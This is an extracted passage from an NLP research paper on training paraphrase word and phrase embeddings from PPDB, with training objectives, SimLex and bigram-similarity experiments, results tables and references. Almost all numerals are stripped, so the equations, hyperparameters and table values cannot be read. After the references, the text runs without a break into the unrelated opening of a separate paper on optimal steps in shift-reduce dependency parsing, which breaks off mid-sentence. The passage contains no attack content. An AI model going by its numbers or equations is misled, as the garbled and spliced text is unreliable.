margin of at least δ. selecting negative examples to select t and t in eq. 
, we simply chose the most similar phrase in the mini-batch (other than those in the given phrase pair). e.g., for choosing t for a given 〈x ,x 〉: t = argmax t:〈t,·〉∈xb\{〈x ,x 〉} g(x ) ·g(t) where xb ⊆ x is the current mini-batch. that is, we want to choose a negative example ti that is sim- ilar to xi according to the current model parameters. the downside of this approach is that we may oc- casionally choose a phrase ti that is actually a true paraphrase of xi. we also tried a strategy in which we selected the least similar phrase that would trig- ger an update (i.e., g(ti)·g(xi) > g(x )·g(x )−δ), but we found the simpler strategy above to work bet- ter and used it for all experiments reported below. discussion the objective in eq. is similar to one used by socher et al. ( ), but with several differ- ences. their objective compared text and projected images. they also did not update the underlying word embeddings; we do so here, and in a way such that they are penalized from deviating from their ini- tialization. also for a given 〈x ,x 〉, they do not select a single t and t as we do, but use the en- tire training set, which can be very expensive with a large training dataset. we also experimented with a simpler objective that sought to directly minimize the squared l - norm between g(x ) and g(x ) in each pair, along with the same regularization terms as in eq. . one problem with this objective function is that the global minimum is and is achieved simply by driv- ing the parameters to . we obtained much better results using the objective in eq. . training word paraphrase models to train just word vectors on word paraphrase pairs (again from ppdb), we used the same objective function as above, but simply dropped the composition terms. this gave us an objective that bears some similarity to the skip-gram objective with negative sampling in word vec (mikolov et al., a). both seek to maximize the dot products of certain word pairs while minimizing the dot products of others. this objective function is: min ww |x| ( ∑ 〈x ,x 〉∈x max( ,δ −w(x )w ·w(x )w + w(x )w ·w(t )w ) + max( ,δ −w(x )w ·w(x )w + w(x )w ·w(t )w ) ) + λww ‖wwinitial −ww‖ ( ) it is like eq. except with word vectors replacing the rnn composition function and with the regular- ization terms on the w and b removed. we further found we could improve this model by incorporating constraints. from our training pairs, for a given word w, we assembled all other words that were paired with it in ppdb and all of their lem- mas. these were then used as constraints during the pairing process: a word t could only be paired with w if it was not in its list of assembled words. experiments – word paraphrasing we first present experiments on learning lexical paraphrasability. we train on word pairs from ppdb and evaluate on the simlex- dataset (hill et al., b), achieving the best results reported to date. . training procedure to learn word vectors that reflect paraphrasability, we optimized eq. . there are many tunable hyper- parameters with this objective, so to make training tractable we fixed the initial learning rates for the word embeddings to . and the margin δ to . then we did a coarse grid search over a parameter space for λww and the mini-batch size. we considered λww values in { − , − , ..., − , } and mini- batch sizes in { , , , }. we trained for epochs for each set of hyperparameters using adagrad (duchi et al., ). 
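as a concrete illustration of the negative-example selection and the ppdb-derived constraint lists described earlier in this section, here is a minimal python/numpy sketch; the mini-batch layout (a pair_of map and per-item excluded sets) and the function name are illustrative assumptions, not the authors' implementation:

import numpy as np

def choose_negative(i, vectors, pair_of, excluded):
    # pick the negative example t for item i: the most similar other item in
    # the mini-batch that is neither i's partner nor in i's constraint list
    sims = vectors @ vectors[i]
    sims[i] = -np.inf
    sims[pair_of[i]] = -np.inf
    for j in excluded.get(i, ()):
        sims[j] = -np.inf
    return int(np.argmax(sims))

# toy mini-batch of 4 word vectors forming the pairs (0, 1) and (2, 3)
rng = np.random.default_rng(0)
vecs = rng.normal(size=(4, 5))
pair_of = {0: 1, 1: 0, 2: 3, 3: 2}
print(choose_negative(0, vecs, pair_of, excluded={0: {2}}))  # forced to pick 3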
for all experiments, we initialized our word vectors with skip-gram vectors trained using word vec (mikolov et al., a). the vectors were trained on english wikipedia (tokenized and lowercased, yielding . b tokens). we used a window size of and a minimum count cut-off of , producing vectors for approximately k word types. we retained vectors for only the k most frequent words, averaging the rest to obtain a single vector for unknown words. we will refer to this set of the k most frequent words as our vocabulary. . extracting training data for training, we extracted word pairs from the lexi- cal xl section of ppdb. we used the xl data for all experiments, including those for phrases. we used xl instead of xxl because xl has better qual- ity overall while still being large enough so that we could be selective in choosing training pairs. there are a total of , pairs. we removed , that either contained numerical digits or words not in our vocabulary. we then removed , re- dundant pairs, leaving us with a final training set of , word pairs. . tuning and evaluation hyperparameters were tuned using the wordsim- (ws ) dataset (finkelstein et al., ), specifi- cally its similarity (ws-s) and relatedness (ws-r) partitions (agirre et al., ). in particular, we tuned to maximize ×ws-s correlation minus the ws-r correlation. the idea was to reward vectors with high similarity and relatively low relatedness, in order to target the paraphrase relationship. we used the december , snapshot. model n sl ρ skip-gram . skip-gram . paragram ws . ∗ + constraints . ∗ hill et al. ( b) . hill et al. ( a) - . inter-annotator agreement n/a . table : results on the simlex- (sl ) word similarity task obtained by performing hyperparameter tuning based on ×ws-s −ws-r and treating sl as a held-out test set. n is word vector dimensionality. a ∗ indicates statistical signifi- cance (p < . ) over the -dimensional skip-gram vectors. after tuning, we evaluated the best hyperparame- ters on the simlex- (sl ) dataset (hill et al., b). we chose sl as our primary test set as it most closely evaluates the paraphrase relationship. even though ws-s is a close approximation to this relationship, it does not include pairs that are merely associated and assigned low scores, which sl does (see discussion in hill et al., b). note that for all experiments we used cosine sim- ilarity as our similarity metric and evaluated the sta- tistical significance of dependent correlations using the one-tailed method of (steiger, ). . results table shows results on sl when improving the initial word vectors by training on word pairs from ppdb, both with and without constraints. the “paragram ws” rows show results when tuning to maximize ×ws-s − ws-r. we also show results for strong skip-gram baselines and the best results from the literature, including the state-of-the-art re- sults from hill et al. ( a) as well as the inter- annotator agreement from hill et al. ( b). the table illustrates that, by training on ppdb, we can surpass the previous best correlations on sl by - % absolute, achieving the best results reported to date. we also find that we can train low-dimensional word vectors that exceed the per- formance of much larger vectors. this is very use- ful as using large vectors can increase both time and memory consumption in nlp applications. to generate word vectors to use for downstream hill et al. ( a) did not report the dimensionality of the vectors that led to their state-of-the-art results. 
applications, we chose hyperparameters so as to maximize performance on sl . these word vectors, which we refer to as paragram vectors, had a ρ of . on sl . we use them as initial word vectors for the remainder of the paper. . sentiment analysis as an extrinsic evaluation of our paragram word vectors, we used them in a convolutional neural network (cnn) for sentiment analysis. we used the simple cnn from kim ( ) and the binary sentence-level sentiment analysis task from socher et al. ( ). we used the standard data splits, re- moving examples with a neutral rating. we trained on all constituents in the training set while only us- ing full sentences from development and test, giving us train/development/test sizes of , / / , . the cnn uses m-gram filters, each of which is an m×n vector. the cnn computes the inner product between an m-gram filter and each m-gram in an example, retaining the maximum match (so-called “max-pooling”). the score of the match is a single dimension in a feature vector for the example, which is then associated with a weight in a linear classifier used to predict positive or negative sentiment. while kim ( ) used m-gram filters of sev- eral lengths, we only used unigram filters. we also fixed the word vectors during learning (called “static” by kim). after learning, the unigram fil- ters correspond to locations in the fixed word vec- tor space. the learned classifier weights represent how strongly each location corresponds to positive or negative sentiment. we expect this static cnn to be more effective if the word vector space separates positive and negative sentiment. in our experiments, we compared baseline skip- gram embeddings to our paragram vectors. we used adagrad learning rate of . , mini-batches of size , and a dropout rate of . . we used un- igram filters and rectified linear units as the activa- tion (applied to the filter output + filter bias). we trained for epochs, predicting labels on the de- velopment set after each set of , examples. we recorded the highest development accuracy and used those parameters to predict labels on the test set. results are shown in table . we see improve- we did not use constraints during training. word vectors n accuracy (%) skip-gram . skip-gram . paragram . table : test set accuracies when comparing embeddings in a static cnn on the binary sentiment analysis task from socher et al. ( ). ments over the baselines when using paragram vectors, even exceeding the performance of higher- dimensional skip-gram vectors. experiments – compositional paraphrasing in this section, we describe experiments on a variety of compositional phrase-based paraphrasing tasks. we start with the simplest case of bigrams, and then proceed to short phrases. for all tasks, we again train on appropriate data from ppdb and test on various evaluation datasets, including our two novel datasets (annotated-ppdb and ml-paraphrase). . training procedure we trained our models by optimizing eq. using adagrad (duchi et al., ). we fixed the initial learning rates to . for the word embeddings and . for the composition parameters, and the mar- gin to . then we did a coarse grid search over a parameter space for λww , λw , and mini-batch size. for λww , our search space again consisted of { − , − , ..., − , }, for λw it was { − , − , − , }, and we explored batch sizes of { , , , , }. when ini- tializing with paragram vectors, the search space for λww was shifted upwards to be { , , − , − , ..., − } to reflect our in- creased confidence in the initial vectors. 
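the coarse grid search over λww, λw, and the mini-batch size can be sketched as follows; train_and_score is a hypothetical stand-in that trains for the fixed number of epochs and returns the tuning criterion (higher is better), and the grids in the usage example are placeholders rather than the exact values listed above:

from itertools import product

def grid_search(train_and_score, lambda_ww_grid, lambda_w_grid, batch_sizes):
    # exhaustively try every combination and keep the best-scoring one
    best_score, best_cfg = float("-inf"), None
    for lam_ww, lam_w, bs in product(lambda_ww_grid, lambda_w_grid, batch_sizes):
        score = train_and_score(lam_ww, lam_w, bs)
        if score > best_score:
            best_score, best_cfg = score, (lam_ww, lam_w, bs)
    return best_cfg, best_score

# usage with a dummy objective and placeholder grids
cfg, score = grid_search(lambda a, b, c: -(a + b + c * 1e-6),
                         lambda_ww_grid=[10.0 ** -k for k in range(1, 7)] + [0.0],
                         lambda_w_grid=[10.0 ** -k for k in (3, 4, 5, 6)],
                         batch_sizes=[25, 50, 100])
print(cfg, score)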
we trained only for epochs for each set of parameters. for baselines, we used the same initial skip-gram vectors as in section . . evaluation and baselines for all experiments, we again used cosine similarity as our similarity metric and evaluated the statistical significance using the method of (steiger, ). a baseline used in all compositional experiments is vector addition of skip-gram (or paragram) word vectors. unlike explicit word vectors, where point-wise multiplication acts as a conjunction of features and performs well on composition tasks (mitchell and lapata, ), using addition with skip-gram vectors (mikolov et al., b) gives bet- ter performance than multiplication. . bigram paraphrasability to evaluate our ability to paraphrase bigrams, we consider the original bigram similarity task from mitchell and lapata ( ) as well as our newly- annotated version of it: ml-paraphrase. extracting training data training data for these tasks was extracted from the xl portion of ppdb. the bigram similarity task from mitchell and lapata ( ) contains three types of bigrams: adjective- noun (jn), noun-noun (nn), and verb-noun (vn). we aimed to collect pairs from ppdb that mirrored these three types of bigrams. we found parsing to be unreliable on such short segments of text, so we used a pos tagger (man- ning et al., ) to tag the tokens in each phrase. we then used the word alignments in ppdb to ex- tract bigrams for training. for jn and nn, we ex- tracted pairs containing aligned, adjacent tokens in the two phrases with the appropriate part-of-speech tag. thus we extracted pairs like 〈easy job, simple task〉 for the jn section and 〈town meeting, town council〉 for the nn section. we used a different strategy for extracting training data for the vn sub- set: we took aligned vn tokens and took the closest noun after the verb. this was done to approximate the direct object that would have been ideally ex- tracted with a dependency parse. an example from this section is 〈achieve goal, achieve aim〉. we removed phrase pairs that ( ) contained words not in our vocabulary, ( ) were redundant with oth- ers, ( ) contained brackets, or ( ) had levenshtein distance ≤ . the final criterion helps to ensure that we train on phrase pairs with non-trivial differences. the final training data consisted of , jn pairs, , vn pairs and , nn pairs. baselines in addition to rnn models, we report baselines that use vector addition as the composition function, both with our skip-gram embeddings and paragram embeddings from section . we also compare to several results from prior work. when doing so, we took their best correla- model mitchell and lapata ( ) bigrams ml-paraphrase word vectors n comp. jn nn vn avg jn nn vn avg skip-gram + . . . . . . . . paragram + . ∗ . . ∗ . . ∗ . . ∗‡ . paragram rnn . ∗† . † . ∗‡ . . ∗‡ . † . ∗ . hashimoto et al. ( ) . . . . . . . . mitchell and lapata ( ) . . . . - - - - human - - - - . . . . table : results on the test section of the bigram similarity task of mitchell and lapata ( ) and our newly annotated version (ml-paraphrase). (n) shows the word vector dimensionality and (“comp.”) shows the composition function used: “+” is vector addition and “rnn” is the recursive neural network. the * indicates statistically significant (p < . ) over the skip-gram model, † statistically significant over the {paragram, +} model, and ‡ statistically significant over hashimoto et al. ( ). tions for each data subset. 
that is, the jn and nn results from mitchell and lapata ( ) use their multiplicative model and the vn results use their di- lation model. from hashimoto et al. ( ) we used their pas-clblm addl and pas-clblm addnl models. we note that their vector dimensionalities are larger than ours, using n = and respec- tively. results results are shown in table . we re- port results on the test portion of the original mitchell and lapata ( ) dataset (ml) as well as the entirety of our newly-annotated dataset (ml- paraphrase). rnn results on ml were tuned on the respective development sections and rnn results on ml-paraphrase were tuned on the entire ml dataset. our rnn model outperforms results from the lit- erature on most sections in both datasets and its av- erage correlations are among the highest. the one subset of the data that posed difficulty was the nn section of the ml dataset. we suspect this is due to the reasons discussed in section . ; for our ml- paraphrase dataset, by contrast, we do see gains on the nn section. we also outperform the strong baseline of adding -dimensional skip-gram embeddings, a model with times the number of parameters, on our ml- paraphrase dataset. this baseline had correlations of . , . , and . on the jn, nn, and vn parti- tions, with an average of . —below the average ρ of the rnn ( . ) and even the {paragram, +} model ( . ). the results obtained here differ from those reported in hashimoto et al. ( ) as we scored their vectors with a newer python implementation of spearman ρ that handles ties (hashimoto, p.c.). interestingly, the type of vectors used to initial- ize the rnn has a significant effect on performance. if we initialize using the -dimensional skip-gram vectors, the average ρ on ml-paraphrase drops to . , below even the {paragram, +} model. . phrase paraphrasability in this section we show that by training a model based on filtered phrase pairs in ppdb, we can ac- tually distinguish between quality paraphrases and poor paraphrases in ppdb better than the original heuristic scoring scheme from ganitkevitch et al. ( ). extracting training data as before, training data was extracted from the xl section of ppdb. similar to the procedure to create our annotated- ppdb dataset, phrases were filtered such that only those with a word overlap score of less than . were kept. we also removed redundant phrases and phrases that contained tokens not in our vocabulary. the phrases were then binned according to their ef- fective size and , examples were selected from bins of effective sizes of , , and more than , cre- ating a training set of , examples. care was taken to ensure that none of our training pairs was also present in our development and test sets. baselines we compare our models with strong lexical baselines. the first, strict word overlap, is the percentage of words in the smaller phrase that are also in the larger phrase. we also include a ver- sion where the words are lemmatized prior to the calculation. we also train a support vector regression model (epsilon-svr) (chang and lin, ) on the fea- tures that are included for each phrase pair in ppdb. we scaled the features such that each lies in the in- terval [− , ] and tuned the parameters using -fold cross validation on our dev set. we then trained on the entire dev set after finding the best performing c and � combination and evaluated on the test set of annotated-ppdb. model word vectors n comp. annotated-ppdb skip-gram + . paragram + . ∗ paragram rnn . ∗†‡ ganitkevitch et al. ( ) . 
word overlap (strict) . word overlap (lemmatized) . ppdb+svr . table : spearman correlation on annotated-ppdb. the * indicates statistically significant (p < . ) over the skip- gram model, the † indicates statistically significant over the {paragram, +} model, and the ‡ indicates statistically sig- nificant over ppdb+svr. results we evaluated on our annotated-ppdb dataset described in § . . table shows the spear- man correlations on the -example test set. rnn models were tuned on the development set of examples. all other methods had no hyperparame- ters and therefore required no tuning. we note that the confidence estimates from gan- itkevitch et al. ( ) reach a ρ of . on the test set, similar to the results of strict overlap. while - dimensional skip-gram embeddings only reach . , we can improve this to . by fine-tuning them us- ing ppdb (thereby obtaining our paragram vec- tors). by using the paragram vectors to initialize the rnn, we reach a correlation of . , which is better than the ppdb confidence estimates by % absolute. we again consider addition of -dimensional skip-gram embeddings as a baseline, and they con- tinue to perform strongly (ρ = . ). the rnn ini- tialized with paragram vectors does reach a higher ρ ( . ), but the difference is not statistically signif- icant (p = . ). thus we can achieve similarly- strong results with far fewer parameters. this task also illustrates the importance of initial- izing our rnn model with appropriate word embed- dings. an rnn initialized with skip-gram vectors we tuned both parameters over { − , − , ..., }. has a modest ρ of . , well below the ρ of the rnn initialized with paragram vectors. clearly, ini- tialization is important when optimizing non-convex objectives like ours, but it is noteworthy that our best results came from first improving the word vectors and then learning the composition model, rather than jointly learning both from scratch. qualitative analysis score range + rnn [ , ) . . [ , ) . . [ , ) . . [ , ] . . table : average absolute error of addition and rnn models on different ranges of gold scores. we performed a qualitative analysis to uncover sources of error and determine differences between adding paragram vectors and using an rnn ini- tialized with them. to do so, we took the output of both systems on annotated-ppdb and mapped their cosine similarities to the interval [ , ]. we then computed their absolute error as compared to the gold ratings. table shows how the average of these absolute errors changes with the magnitude of the gold rat- ings. the rnn performs better (has lower average absolute error) for less similar pairs. vector addi- tion only does better on the most similar pairs. this is presumably because the most positive pairs have high word overlap and so can be represented effec- tively with a simpler model. to further investigate the differences between these models, we removed those pairs with gold scores in [ , ], in order to focus on pairs with ex- treme scores. we identified two factors that dis- tinguished the performance between the two mod- els: length ratio and the amount of lexical overlap. we did not find evidence that non-compositional phrases, such as idioms, were a source of error as these were not found in ml-paraphrase and only ap- pear rarely in annotated-ppdb. we define length ratio as simply the number of tokens in the smaller phrase divided by the number of tokens in the larger phrase. 
overlap ratio is the number of equivalent tokens in the phrase pair di- index phrase phrase length ratio overlap ratio gold rnn + scheduled to be held in that will take place in . . . . . according to the paper , the newspaper reported that . . . . . at no cost to without charge to . . . . . ’s surname family name of . . . . . could have an impact on may influence . . . . . to participate actively to play an active role . . . . . earliest opportunity early as possible . . . . . does not exceed is no more than . . . . . table : illustrative phrase pairs from annotated-ppdb with gold similarity > . the last three columns show the gold similarity score, the similarity score of the rnn model, and the similarity score of vector addition. we note that addition performs better when the pairs have high length ratio (rows – ) or overlap ratio (rows – ) while the rnn does better when those values are low (rows – and – respectively). boldface indicates smaller error compared to gold scores. vided by the number of tokens in the smaller of the two phrases. equivalent tokens are defined as to- kens that are either exact matches or are paired up in the lexical portion of ppdb used to train the para- gram vectors. table shows how the performance of the mod- els changes under different values of length ratio and overlap ratio. the values in this table are the per- centage changes in absolute error when using the rnn over the paragram vector addition model. so negative values indicate superior performance by the rnn. length ratio [ , . ] ( . , . ] ( . , ] positive examples - . . . negative examples - . - . - . both - . - . - . overlap ratio [ , ] ( , ] ( , ] positive examples - . . . negative examples - . - . - . both - . - . . table : comparison of the addition and rnn model on phrase pairs of different overlap and length ratios. the values in the table are the percent change in absolute error from the addition model to the rnn model. negative examples are defined as pairs from annotated-ppdb whose gold score is less than and positive examples are those with scores greater than . “both” refers to both negative and positive examples. a few trends emerge from this table. one is that as the length ratio increases (i.e., the phrase pairs are closer in length), addition surpasses the rnn for positive examples. for negative examples, the the bin delimiters were chosen to be uniform over the range of output values of the length ratio ([ . , ] with one out- lier data point removed) and overlap ratio ([ , ]). trend is reversed. the same trend appears for over- lap ratio. examples from annotated-ppdb illustrat- ing these trends on positive examples are shown in table . when considering both positive and negative ex- amples (“both”), we see that the rnn excels on the most difficult examples (large differences in phrase length and less lexical overlap). for easier exam- ples, the two fare similarly overall (- . to . % change), but the rnn does much better on nega- tive examples. this aligns with the intuition that addition should perform well when two paraphrastic phrases have high lexical overlap and similar length. but when they are not paraphrases, simple addition is misled and the rnn’s learned composition func- tion better captures the relationship. this may sug- gest new architectures for modeling composition- ality differently depending on differences in length and amount of overlap. 
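the two ratios used in this analysis can be computed as in the python sketch below; representing the lexical portion of ppdb as a set of unordered word pairs, and counting each token of the smaller phrase at most once, are simplifying assumptions made here for illustration:

def length_ratio(p1, p2):
    # number of tokens in the smaller phrase divided by that of the larger
    n1, n2 = len(p1.split()), len(p2.split())
    return min(n1, n2) / max(n1, n2)

def overlap_ratio(p1, p2, lexical_pairs=frozenset()):
    # equivalent tokens (exact match or paired in the lexical paraphrase list)
    # divided by the number of tokens in the smaller of the two phrases
    t1, t2 = p1.split(), p2.split()
    small, large = (t1, t2) if len(t1) <= len(t2) else (t2, t1)
    equivalent = sum(
        1 for tok in small
        if tok in large or any(frozenset((tok, o)) in lexical_pairs for o in large)
    )
    return equivalent / len(small)

pairs = {frozenset(("influence", "impact"))}
print(length_ratio("could have an impact on", "may influence"))          # 0.4
print(overlap_ratio("could have an impact on", "may influence", pairs))  # 0.5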
conclusion we have shown how to leverage ppdb to learn state-of-the-art word embeddings and compositional models for paraphrase tasks. since ppdb was cre- ated automatically from parallel corpora, our models are also built automatically. only small amounts of annotated data are used to tune hyperparameters. we also introduced two new datasets to evaluate compositional models of short paraphrases , fill- ing a gap in the nlp community, as currently there are no datasets created for this purpose. successful models on these datasets can then be used to extend the coverage of, or provide an alternative to, ppdb. http://web.engr.illinois.edu/˜wieting / http://web.engr.illinois.edu/~wieting / there remains a great deal of work to be done in developing new composition models, whether with new network architectures or distance functions. in this work, we based our composition function on constituent parse trees, but this may not be the best approach—especially for short phrases. depen- dency syntax may be a better alternative (socher et al., ). besides improving composition, another direction to explore is how to use models for short phrases in sentence-level paraphrase recognition and other downstream tasks. acknowledgements we thank the editor and the anonymous reviewers as well as juri ganitkevitch, dan roth, weiran wang, and kazuma hashimoto for their valuable com- ments and technical assistance. we also thank chris callison-burch, dipanjan das, kuzman ganchev, ellie pavlick, slav petrov, owen rambow, david sontag, oscar täckström, kapil thadani, lyle un- gar, benjamin van durme, and mo yu for helpful conversations. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius paşca, and aitor soroa. . a study on similarity and relatedness using distributional and wordnet-based approaches. in proceedings of hu- man language technologies: the annual con- ference of the north american chapter of the associa- tion for computational linguistics, pages – . as- sociation for computational linguistics. ion androutsopoulos and prodromos malakasiotis. . a survey of paraphrasing and textual entailment methods. journal of artificial intelligence research, pages – . colin bannard and chris callison-burch. . para- phrasing with bilingual parallel corpora. in proceed- ings of the rd annual meeting on association for computational linguistics, pages – . associa- tion for computational linguistics. mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for depen- dency parsing. in proceedings of the annual meeting of the association for computational linguistics. marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics. yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. the journal of machine learning re- search, : – . jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of acl. johannes bjerva, johan bos, rob van der goot, and malvina nissim. . the meaning factory: for- mal semantics for recognizing textual entailment and determining semantic similarity. semeval , page . william blacoe and mirella lapata. . a compari- son of vector-based representations for semantic com- position. 
in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing, emnlp-conll ’ , pages – , strouds- burg, pa, usa. association for computational lin- guistics. wauter bosma and chris callison-burch. . para- phrase substitution for recognizing textual entail- ment. in proceedings of the th international confer- ence on cross-language evaluation forum: evalua- tion of multilingual and multi-modal information re- trieval, clef’ , pages – , berlin, heidelberg. springer-verlag. chih-chung chang and chih-jen lin. . libsvm: a library for support vector machines. acm trans- actions on intelligent systems and technology (tist), ( ): . scott c. deerwester, susan t dumais, thomas k. lan- dauer, george w. furnas, and richard a. harshman. . indexing by latent semantic analysis. jasis, ( ): – . bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in pro- ceedings of coling , pages – , geneva, switzerland, aug –aug . coling. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. j. mach. learn. res., : – , july. anthony fader, luke zettlemoyer, and oren etzioni. . paraphrase-driven learning for open question answering. in proceedings of the st annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , sofia, bul- garia, august. association for computational linguis- tics. manaal faruqui, jesse dodge, sujay kumar jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – . lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and eytan ruppin. . placing search in context: the con- cept revisited. in proceedings of the th international conference on world wide web, pages – . acm. j.r. firth. . a synopsis of linguistic theory, - . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in hlt-naacl, pages – . the as- sociation for computational linguistics. kazuma hashimoto, pontus stenetorp, makoto miwa, and yoshimasa tsuruoka. . jointly learning word representations and composition functions us- ing predicate-argument structures. in proceedings of the conference on empirical methods in natural language processing, doha, qatar, october. associa- tion for computational linguistics. felix hill, kyunghyun cho, sebastien jean, coline devin, and yoshua bengio. a. not all neu- ral embeddings are born equal. arxiv preprint arxiv: . . felix hill, roi reichart, and anna korhonen. b. simlex- : evaluating semantic models with (gen- uine) similarity estimation. corr, abs/ . . yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of nd annual meet- ing of the association for computational linguistics: system demonstrations, pages – . yuval marton, chris callison-burch, and philip resnik. . 
improved statistical machine translation using monolingually-derived paraphrases. in proceedings of the conference on empirical methods in natural language processing, pages – , singapore, au- gust. association for computational linguistics. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems, pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in acl, pages – . citeseer. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word rep- resentation. proceedings of the empiricial methods in natural language processing (emnlp ), . chris quirk, chris brockett, and william dolan. . monolingual machine translation for paraphrase gen- eration. in dekang lin and dekai wu, editors, pro- ceedings of emnlp , pages – , barcelona, spain, july. association for computational linguis- tics. pushpendre rastogi and benjamin van durme. . augmenting framenet via ppdb. in proceedings of the second workshop on events: definition, detec- tion, coreference, and representation, pages – , bal- timore, maryland, usa, june. association for compu- tational linguistics. fabio rinaldi, james dowdall, kaarel kaljurand, michael hess, and diego mollá. . exploit- ing paraphrases in a question answering system. in proceedings of the second international workshop on paraphrasing, pages – , sapporo, japan, july. as- sociation for computational linguistics. richard socher, christopher d manning, and andrew y ng. . learning continuous phrase representa- tions and syntactic parsing with recursive neural net- works. in proceedings of the nips- deep learn- ing and unsupervised feature learning workshop, pages – . richard socher, eric h huang, jeffrey pennin, christo- pher d manning, and andrew y ng. . dynamic pooling and unfolding recursive autoencoders for para- phrase detection. in advances in neural information processing systems, pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , seattle, washington, usa, october. association for computational linguistics. richard socher, andrej karpathy, quoc v. le, christo- pher d. manning, and andrew y. ng. . grounded compositional semantics for finding and de- scribing images with sentences. tacl, : – . james h steiger. . tests for comparing ele- ments of a correlation matrix. psychological bulletin, ( ): . xuchen yao, benjamin van durme, chris callison- burch, and peter clark. . semi-markov phrase- based monolingual alignment. in emnlp, pages – . mo yu and mark dredze. . improving lexical em- beddings with semantic knowledge. in proceedings of the nd annual meeting of the association for com- putational linguistics (volume : short papers), pages – , baltimore, maryland, june. association for computational linguistics. mo yu and mark dredze. . learning composi- tion models for phrase embeddings. 
transactions of the association for computational linguistics, : – . fabio massimo zanzotto, ioannis korkontzelos, francesca fallucchi, and suresh manandhar. . estimating linear models for compositional dis- tributional semantics. in proceedings of the rd international conference on computational linguis- tics, pages – . association for computational linguistics. calculating the optimal step in shift-reduce dependency parsing: from cubic to linear time mark-jan nederhof school of computer science university of st andrews, uk markjan.nederhof@googlemail.com abstract we present a new cubic-time algorithm to calculate the optimal next step in shift-reduce dependency parsing, relative to ground truth, commonly referred to as dynamic oracle. un- like existing algorithms, it is applicable if the training corpus contains non-projective struc- tures. we then show that for a projective training corpus, the time complexity can be improved from cubic to linear. introduction a deterministic parser may rely on a classifier that predicts the next step, given features extracted from the present configuration (yamada and matsumoto, ; nivre et al., ). it was found that accuracy improves if the classifier is trained not just on configurations that correspond to the ground-truth, or ‘‘gold’’, tree, but also on configurations that a parser would typically reach when a classifier strays from the optimal predictions. this is known as a dynamic oracle. the effective calculation of the optimal step for some kinds of parsing relies on ‘arc-decomposibility’, as in the case of goldberg and nivre ( , ). this generally requires a projective training cor- pus; an attempt to extend this to non-projective training corpora had to resort to an approxima- tion (aufrant et al., ). it is known how to calculate the optimal step for a number of non- a term we avoid here, as dynamic oracles are neither oracles nor dynamic, especially in our formulation, which allows gold trees to be non-projective. following, for example, kay ( ), an oracle informs a parser whether a step may lead to the correct parse. if the gold tree is non-projective and the parsing strategy only allows projective trees, then there are no steps that lead to the correct parse. at best, there is an optimal step, by some definition of optimality. an algorithm to compute the optimal step, for a given configuration, would typically not change over time, and therefore is not dynamic in any generally accepted sense of the word. projective parsing algorithms, however (gómez- rodrı́guez et al., ; gómez-rodrı́guez and fernández-gonzález, ; fernández-gonzález gómez-rodrı́guez, a); see also de lhoneux et al. ( ). ordinary shift-reduce dependency parsing is known at least since fraser ( ); see also nasr ( ). nivre ( ) calls it ‘‘arc-standard parsing.’’ for shift-reduce dependency parsing, calculation of the optimal step is regarded to be difficult. the best known algorithm is cubic and is only applicable if the training corpus is projective (goldberg et al., ). we present a new cubic-time algorithm that is also applicable to non-projective training corpora. moreover, its architecture is modular, expressible as a generic tabular algorithm for dependency parsing plus a context-free grammar that expresses the allow- able transitions of the parsing strategy. this dif- fers from approaches that require specialized tabular algorithms for different kinds of parsing (gómez-rodrı́guez et al., ; huang and sagae, ; kuhlmann et al., ). 
the generic tabular algorithm is interesting in its own right, and can be used to determine the optimal projectivization of a non-projective tree. this is not to be confused with pseudo-projectivization (kahane et al., ; nivre and nilsson, ), which generally has a different architecture and is used for a different purpose, namely, to allow a projective parser to produce non-projective structures, by encoding non-projectivity into projective structures before training, and then reconstructing potential non-projectivity after parsing. a presentational difference with earlier work is that we do not define optimality in terms of "loss" or "cost" functions but directly in terms of attainable accuracy. this perspective is shared by straka et al. ( ), who also relate accuracies of competing steps, albeit by means of actual parser output and not in terms of best attainable accuracies. we further show that if the training corpus is projective, then the time complexity can be reduced to linear. to achieve this, we develop a new approach of excluding computations whose accuracies are guaranteed not to exceed the accuracies of the remaining computations. the main theoretical conclusion is that arc-decomposability is not a necessary requirement for efficient calculation of the optimal step. despite advances in unrestricted non-projective parsing, as, for example, fernández-gonzález and gómez-rodrı́guez ( b), many state-of-the-art dependency parsers are projective, as, for example, qi and manning ( ). one main practical contribution of the current paper is that it introduces new ways to train projective parsers using non-projective trees, thereby enlarging the portion of trees from a corpus that is available for training. this can be done either after applying optimal projectivization, or by computing optimal steps directly for non-projective trees. this can be expected to lead to more accurate parsers, especially if a training corpus is small and a large proportion of it is non-projective. preliminaries in this paper, a configuration (for sentence length n) is a triple (α, β, t) consisting of a stack α, which is a string of integers each between 0 and n, a 